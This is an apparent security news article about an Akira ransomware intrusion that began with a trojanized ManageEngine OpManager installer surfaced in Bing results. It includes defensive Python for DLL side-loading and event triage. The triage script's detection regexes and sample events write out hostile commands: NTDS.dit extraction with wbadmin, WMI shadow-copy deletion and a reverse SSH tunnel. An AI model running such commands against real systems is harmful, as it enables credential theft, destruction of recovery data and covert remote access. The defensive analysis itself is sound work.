Hackers News

Threats

Bing Search Results Lead to Akira Ransomware via ManageEngine OpManager


Marcus Rodriguez
July 1, 2026

Key Takeaways

  • Threat actors used SEO poisoning on Bing to push a malicious installer disguised as ManageEngine OpManager into the search results for that product.
  • The attack chain deployed the BumbleBee loader and an AdaptixC2 beacon, and ended with Akira ransomware across the victim’s network.
  • The intrusion included lateral movement, credential theft (LSASS dumps, Veeam credentials and extraction of the Active Directory database, NTDS.dit) and the exfiltration of more than 75GB of data.
  • From initial compromise to ransomware deployment took approximately 44 hours.
  • The incident shows that a search result is an initial-access vector in its own right, and that download verification, DLL side-loading controls and privileged-group monitoring are the controls that break this kind of chain.

A sophisticated ransomware attack has been traced back to a seemingly innocuous Bing search for a common IT administration tool. Threat actors exploited search engine optimization (SEO) poisoning to insert a counterfeit download link high in Bing’s results, leading an unsuspecting IT administrator to install malware instead of legitimate software. This incident underscores a growing concern: everyday search activities can inadvertently become the initial vector for a severe network breach.

The infiltration began in July 2025 when a user initiated a Bing search for “ManageEngine OpManager,” a widely utilized network monitoring solution. Instead of being directed to the official vendor website, the user landed on a meticulously crafted imposter domain. This deceptive site then delivered a trojanized Microsoft Installer (MSI) package, setting in motion a multi-day intrusion that ultimately resulted in the deployment of Akira ransomware throughout the victim’s network.

The DFIR Report published its analysis of the intrusion on June 29, 2026, in collaboration with Swisscom B2B CSIRT. The report identifies the BumbleBee loader and an AdaptixC2 beacon as the attackers’ primary tools for maintaining access and moving through the compromised environment.

The attackers worked methodically. They created fraudulent administrative accounts, installed remote access software as a Windows service for persistence, extracted the Active Directory database, and exfiltrated more than 75GB of sensitive data to a server located in Ukraine. From the initial click on the malicious link to full-scale ransomware deployment took approximately 44 hours.

The impact was severe. The Akira ransomware binary, identified as locker.exe, used Windows Management Instrumentation (WMI) to delete Volume Shadow Copies before encrypting critical systems, removing the easiest local recovery path. Two days later the threat actor returned and encrypted a child domain as well, so that no segment of the network was left untouched.

ManageEngine OpManager Delivers Akira Ransomware

The infection originated from opmanager[.]pro, a fraudulent domain that achieved high visibility in Bing search results through SEO poisoning. This site meticulously mimicked the authentic ManageEngine download page, subsequently redirecting victims to download-center[.]online, where the malicious MSI installer was served to the target machine.

Upon execution, the ManageEngine-OpManager.msi installer dropped three files into a temporary directory: the legitimate OpManager software (acting as a decoy), consent.exe (a genuine, Microsoft-signed Windows binary), and the BumbleBee loader, disguised as msimg32.dll. Because consent.exe was launched from that temporary directory, the Windows loader probed the application’s own directory before System32 for DLLs referenced by name, so the attacker’s msimg32.dll was mapped in place of the genuine one and BumbleBee ran inside a trusted, signed process. This DLL search-order hijack (side-loading) is what lets the loader evade conventional security tooling that keys on the host process.
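To make the search-order point concrete, the following Python model of the loader’s resolution sequence is an added example, not code from the article or from The DFIR Report. It assumes SafeDllSearchMode (the Windows default), a constructed set of files on disk, and a partial, assumed KnownDLLs list; the real list lives under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.

```python
"""Model of the Windows DLL search order (SafeDllSearchMode on, the default) showing
why a msimg32.dll dropped next to a copied consent.exe is the one that gets loaded.
Added example; not code from the article or The DFIR Report. FILES is a constructed
snapshot and KNOWN_DLLS is a partial, assumed list for illustration only."""
from pathlib import PureWindowsPath

SYSTEM32 = r"C:\Windows\System32"
WINDIR = r"C:\Windows"
# KnownDLLs are always mapped from System32, so they cannot be hijacked from the
# application directory. Assumed subset; read the registry key for the real list.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "user32.dll", "gdi32.dll", "advapi32.dll"}


def search_order(exe_path, cwd, path_dirs=()):
    """Directories the loader probes, in order, for a DLL referenced by file name only."""
    app_dir = str(PureWindowsPath(exe_path).parent)
    return [app_dir, SYSTEM32, rf"{WINDIR}\System", WINDIR, cwd, *path_dirs]


def resolve_dll(dll_name, exe_path, files, cwd=r"C:\Users\admin", path_dirs=()):
    """Full path the loader would map for dll_name, or None. `files` is the set of existing paths."""
    if dll_name.lower() in KNOWN_DLLS:
        return rf"{SYSTEM32}\{dll_name}"
    existing = {f.lower() for f in files}
    for directory in search_order(exe_path, cwd, path_dirs):
        candidate = rf"{directory}\{dll_name}"
        if candidate.lower() in existing:
            return candidate
    return None


def is_sideloaded(dll_name, exe_path, files, **kwargs):
    """True when a DLL that ships in System32 would instead be satisfied from another directory."""
    chosen = resolve_dll(dll_name, exe_path, files, **kwargs)
    genuine = rf"{SYSTEM32}\{dll_name}".lower()
    return chosen is not None and chosen.lower() != genuine and genuine in {f.lower() for f in files}


# Constructed snapshot of the relevant files after the trojanized MSI has run.
TEMP = r"C:\Users\admin\AppData\Local\Temp"
FILES = {
    rf"{SYSTEM32}\consent.exe", rf"{SYSTEM32}\msimg32.dll",  # genuine copies
    rf"{TEMP}\consent.exe", rf"{TEMP}\msimg32.dll",          # dropped by the installer
}

if __name__ == "__main__":
    for exe in (rf"{TEMP}\consent.exe", rf"{SYSTEM32}\consent.exe"):
        verdict = "sideloaded" if is_sideloaded("msimg32.dll", exe, FILES) else "genuine"
        print(exe, "->", resolve_dll("msimg32.dll", exe, FILES), verdict)
```

Running it shows the two outcomes side by side: the copy of consent.exe in the temp directory resolves msimg32.dll from that same directory, while the genuine consent.exe in System32 resolves the genuine DLL. A KnownDLL such as kernel32.dll resolves to System32 regardless of where the executable lives, which is why attackers pick a non-KnownDLL import like msimg32.dll.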

The MSI package itself was signed with a revoked code-signing certificate issued to “LLC Resource+,” an entity previously linked to BumbleBee distribution. A revoked certificate only protects a victim if the installer’s signature and the certificate’s revocation status are actually checked before execution; a double-click does not do that. Impersonating a ManageEngine installer was a deliberate targeting choice: the IT administrators who install such tools hold elevated privileges, so a single infection yields a foothold from which the wider network can be compromised.

AdaptixC2, Lateral Movement, and Data Exfiltration

Approximately five hours after the infection, BumbleBee launched AdgNsy.exe, a renamed copy of the legitimate Windows Address Book utility into which AdaptixC2 shellcode had been injected. This established a persistent command-and-control (C2) channel to 172.96.137[.]160, from which the attacker began internal reconnaissance to identify critical assets, including domain controllers.

The attackers then created two unauthorized domain accounts, backup_DA and backup_EA. Crucially, backup_EA was elevated to the Enterprise Admins group, granting the attackers complete control over the entire Active Directory forest. Subsequently, RustDesk remote access software was installed as a Windows service on multiple servers, ensuring continued access even if other C2 channels were disrupted.

On the second day of the intrusion, the attacker gained access to a domain controller via RDP and extracted the NTDS.dit Active Directory database using wbadmin.exe. Credentials for Veeam were also siphoned from a PostgreSQL database, and LSASS memory was dumped across several hosts. To further evade detection and firewall restrictions, a reverse SSH tunnel was established, routing RDP traffic through an external server.

What You Should Do

  • Verify Software Downloads: Download software only from the vendor’s official site, reached by a typed or bookmarked URL rather than a search result. Before execution, check the installer’s Authenticode signature, including the certificate’s revocation status; the MSI in this case carried a revoked certificate, which a signature check that honours revocation would have flagged.
  • Enhance Search Engine Vigilance: Treat search results for enterprise software, sponsored results included, with suspicion. Confirm the domain belongs to the vendor and scrutinize URLs for look-alike names and unusual top-level domains (opmanager[.]pro is not a ManageEngine domain).
  • Implement Strong Endpoint Detection and Response (EDR): Use EDR to detect anomalous process behaviour, DLL side-loading (a System32 library name loaded from a user-writable directory), renamed system binaries, and unexpected executable drops in temp directories.
  • Monitor for Rogue Accounts and Privilege Escalation: Alert on new account creation (Security event 4720) and on additions to highly privileged groups such as Enterprise Admins and Domain Admins (Security events 4728 for global and 4756 for universal groups). The backup_DA and backup_EA accounts in this intrusion would have tripped both.
  • Control MSI Execution: Use AppLocker or Windows Defender Application Control, backed by Group Policy, to restrict MSI execution to signed packages from approved publishers and to block installers launched from user-writable or network locations.
  • Enforce DLL Load Order Controls: Mitigate DLL search-order hijacking by requiring fully qualified DLL paths in in-house code, preventing copies of system binaries from running out of user-writable directories, and alerting when a DLL whose name matches a System32 library is loaded from anywhere else.
  • Audit Remote Access Tools: Monitor service installations (System event 7045) for remote access software such as RustDesk; registering such tools as a Windows service is a common persistence mechanism, and it survives the loss of the attacker’s primary C2 channel.
  • Regularly Backup and Isolate Data: Maintain regular, immutable backups of critical data and keep them offline or in isolated environments, because shadow copies on the encrypted hosts will be deleted first.
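The following Python triage script is an added example, not code from the article, The DFIR Report or any vendor. It shows how several of the detections above can be expressed as rules over event records that mirror this intrusion’s chain: the side-loaded msimg32.dll, the renamed Address Book binary, the Enterprise Admins addition, the RustDesk service, the wbadmin copy of NTDS.dit, the WMI shadow-copy deletion and the reverse SSH tunnel. Field names follow Sysmon (EventID 1 and 7), Security (4728/4756) and System (7045) conventions; the events, host names, paths and the assumption that the Windows Address Book binary’s PE name is wab.exe are all constructed for the example.

```python
"""Rule-based triage of Windows and Sysmon events for the behaviours seen in the
OpManager/Akira intrusion. Added example; not code from the article, The DFIR Report
or Swisscom. SAMPLE_EVENTS are constructed dicts with Sysmon (EventID 1, 7), Security
(4728/4756) and System (7045) field names; every value, host and path is invented."""
import re
from pathlib import PureWindowsPath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Sample of DLL names that legitimately live only in the system directories;
# in practice build this set from a golden image rather than hardcoding it.
SYSTEM_DLLS = {"msimg32.dll", "version.dll", "dbghelp.dll", "cryptbase.dll"}
PRIV_GROUPS = {"enterprise admins", "domain admins", "schema admins", "administrators"}
REMOTE_TOOLS = ("rustdesk", "anydesk", "screenconnect", "atera", "splashtop")
SUSPICIOUS_CMDLINES = (
    ("shadow copy deletion",
     re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy.*delete|win32_shadowcopy", re.I)),
    ("NTDS.dit extraction via wbadmin", re.compile(r"wbadmin.*(ntds|systemstate)", re.I)),
    ("reverse SSH tunnel", re.compile(r"\bssh(\.exe)?\b.*\s-R\s", re.I)),
)


def _base(path):
    return PureWindowsPath(path).name.lower()


def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def check_event(ev):
    """Return (rule, detail) findings for one event; an empty list means nothing matched."""
    findings = []
    eid = ev.get("EventID")
    if eid == 7:  # Sysmon: image (DLL) loaded
        loaded = ev["ImageLoaded"]
        if _base(loaded) in SYSTEM_DLLS and not _in_system_dir(loaded):
            findings.append(("dll side-loading",
                             f"{_base(ev['Image'])} loaded {loaded} from outside the system directories"))
    elif eid == 1:  # Sysmon: process created
        image, cmdline = ev["Image"], ev.get("CommandLine", "")
        original = ev.get("OriginalFileName", "").lower()
        # The PE header's OriginalFileName survives a rename of the file on disk.
        if original and original != _base(image):
            findings.append(("renamed binary", f"{image} is really {original}"))
        for rule, pattern in SUSPICIOUS_CMDLINES:
            if pattern.search(cmdline):
                findings.append((rule, cmdline))
    elif eid in (4728, 4756):  # Security: member added to a global (4728) or universal (4756) group
        if ev["TargetUserName"].lower() in PRIV_GROUPS:
            findings.append(("privileged group change",
                             f"{ev['SubjectUserName']} added {ev['MemberName']} to {ev['TargetUserName']}"))
    elif eid == 7045:  # System: a new service was installed
        if any(tool in ev["ImagePath"].lower() for tool in REMOTE_TOOLS):
            findings.append(("remote access tool service", f"{ev['ServiceName']} -> {ev['ImagePath']}"))
    return findings


def triage(events):
    """Apply check_event to every event; returns (time, host, rule, detail) tuples in order."""
    return [(ev.get("UtcTime"), ev.get("Computer"), rule, detail)
            for ev in events for rule, detail in check_event(ev)]


TEMP = r"C:\Users\admin\AppData\Local\Temp"
SAMPLE_EVENTS = [  # constructed to mirror the article's chain; not real telemetry
    {"EventID": 7, "UtcTime": "d1 10:02", "Computer": "WS01",
     "Image": rf"{TEMP}\consent.exe", "ImageLoaded": rf"{TEMP}\msimg32.dll"},
    {"EventID": 7, "UtcTime": "d1 10:02", "Computer": "WS01",  # benign control
     "Image": r"C:\Windows\System32\consent.exe", "ImageLoaded": r"C:\Windows\System32\msimg32.dll"},
    {"EventID": 1, "UtcTime": "d1 15:10", "Computer": "WS01",
     "Image": r"C:\Users\admin\AppData\Roaming\AdgNsy.exe",
     "OriginalFileName": "wab.exe",  # assumed PE name of the Windows Address Book binary
     "CommandLine": r"C:\Users\admin\AppData\Roaming\AdgNsy.exe"},
    {"EventID": 4756, "UtcTime": "d1 18:30", "Computer": "DC01", "SubjectUserName": "admin",
     "MemberName": "CN=backup_EA,CN=Users,DC=corp,DC=local", "TargetUserName": "Enterprise Admins"},
    {"EventID": 7045, "UtcTime": "d1 19:00", "Computer": "SRV02",
     "ServiceName": "RustDesk", "ImagePath": r"C:\Program Files\RustDesk\rustdesk.exe --service"},
    {"EventID": 1, "UtcTime": "d2 09:15", "Computer": "DC01",
     "Image": r"C:\Windows\System32\wbadmin.exe", "OriginalFileName": "wbadmin.exe",
     "CommandLine": r"wbadmin start backup -backuptarget:\\SRV02\share -include:C:\Windows\NTDS\ntds.dit -quiet"},
    {"EventID": 1, "UtcTime": "d2 22:40", "Computer": "SRV02",
     "Image": r"C:\Windows\Temp\locker.exe", "OriginalFileName": "",
     "CommandLine": r"powershell -c Get-WmiObject Win32_ShadowCopy | Remove-WmiObject"},
    {"EventID": 1, "UtcTime": "d2 11:05", "Computer": "SRV02",
     "Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "OriginalFileName": "ssh.exe",
     "CommandLine": r"ssh.exe -N -R 33389:127.0.0.1:3389 tunnel@203.0.113.10"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(*hit, sep=" | ")
```

The benign control event (genuine consent.exe loading the genuine msimg32.dll from System32) produces no finding, which is the property a side-loading rule must have to be usable at scale; the remaining seven events each trip exactly one rule. In production the same rules would run over a SIEM export rather than an inline list, and SYSTEM_DLLS would be generated from a clean build rather than typed in.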


Tags: Attack, Exploit, Malware, ransomware, Security, Threat

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.
